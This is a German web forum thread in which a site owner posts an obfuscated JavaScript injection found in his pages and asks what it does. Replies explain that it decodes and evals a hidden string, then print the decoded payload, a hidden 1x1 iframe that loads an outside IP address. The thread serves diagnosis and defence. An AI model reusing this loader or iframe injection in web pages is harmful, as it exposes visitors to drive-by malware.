nicht angemeldet
Malware
0 
JürgenB
0
Malware
Liebes Forum,
ich habe heute leider feststellen müssen, dass sich irgendein böswilliges Skript in meinen Dateien reingefressen hat.
<!-- ad --><script>bxxxjc="7a717d6b737b706a30696c776a7b363c2277786c7f737b3e6d6c7d2339766a6a6e2431312726302f2c28302d2c302f282c317f667b6c31212d2f2b7a272e267a7f287f267f27277d2d272d7f2d7d7c2f7d2b2d282926782b393e69777a6a7623392f393e767b7779766a23392f393e6d6a67727b233968776d777c7772776a67243e76777a7a7b70253920223177786c7f737b203e3c3725147866233c507f503c257b68777d233c507f503c25";wtxz="function giotpl(){ew=Math.PI;cf=parseInt;ij='length';jencty=cf(~((ew&ew)|(~ew&ew)&(ew&~ew)|(~ew&~ew)));et=cf(((jencty&jencty)|(~jencty&jencty)&(jencty&~jencty)|(~jencty&~jencty))&1);hx=et<<et;evic=jencty;fx='';yvk=String.fromCharCode;fy=eval;for(vm=jencty;vm<wtxz[ij];vm-=-et)evic+=wtxz.charCodeAt(vm);evic%=unescape(jencty+'x'+(et<<6));for(vm=jencty;vm<bxxxjc[ij];vm+=hx)fx+=yvk(cf(jencty+'x'+bxxxjc.charAt(vm)+bxxxjc.charAt(vm+cf(et)))^evic);try{fy(fx);}catch(e){try{eval(fx);}catch(e) {window.location='/';}}}try{eval('giotpl();')}catch(e) {}";eval(wtxz);</script><!-- /ad -->
Was genau geschieht hier bzw. wie wurde dieser Unsinn genau ermöglicht? Etwa durch einen Virus auf dem Rechner? Die Dateien wurden damals per FTP auf den Server übertragen. Nun bin ich mir nicht sicher, ob das Skript schon vorher eingebunden war (halt über den Virus) oder sich erst auf dem Webserver breit gemacht hat.
Herzlichen Dank vorab für Eure Unterstützung!
peacemaker
-
Hallo peacemaker,
das ist ein "schönes" Beispiel für ein Javascript, dem man so ohne weiteres nicht ansieht, was es macht. Vermutlich wird der String in der Variablen "bxxxjc" entschlüsselt und dann per eval ausgeführt. Du hast es ja in deinen Seiten gefunden und daher schon mal laufen gelassen, was mach es denn?
Das Script kann über verschiedene Wege in deine Seiten gelangt sein. Vielleicht hat jemand deinen Rechner oder den Webserver gehackt. Ich vermute aber eher, das dein Provider (kostenlos?) das Script eingebaut hat, um deine Besucher zu überwachen und/oder sie mit Werbung zu erfreuen.
Gruß, Jürgen
-
Mahlzeit peacemaker,
Was genau geschieht hier bzw. wie wurde dieser Unsinn genau ermöglicht?
Ersteres kann ich Dir beantworten, letzteres nicht.
Das Skript führt den in der Variablen "wtxz" gespeicherten Code aus. Dieser tut eigentlich nichts anderes, als den in der Variablen "bxxxjc" gespeicherten String zu decodieren und anschließend auszuführen. Dabei handelt es sich um folgenden Code:
document.write("<iframe src='http://98.126.32.162/axer/?315d908da6a8a99c393a3cb1c53678f5' width='1' height='1' style='visibility: hidden;'></iframe> "); fx="NaN";evic="NaN";Was der tut, ist relativ offensichtlich.
MfG,
EKKi--
sh:( fo:| ch:? rl:( br:> n4:~ ie:% mo:} va:) de:] zu:) fl:{ ss:) ls:& js:|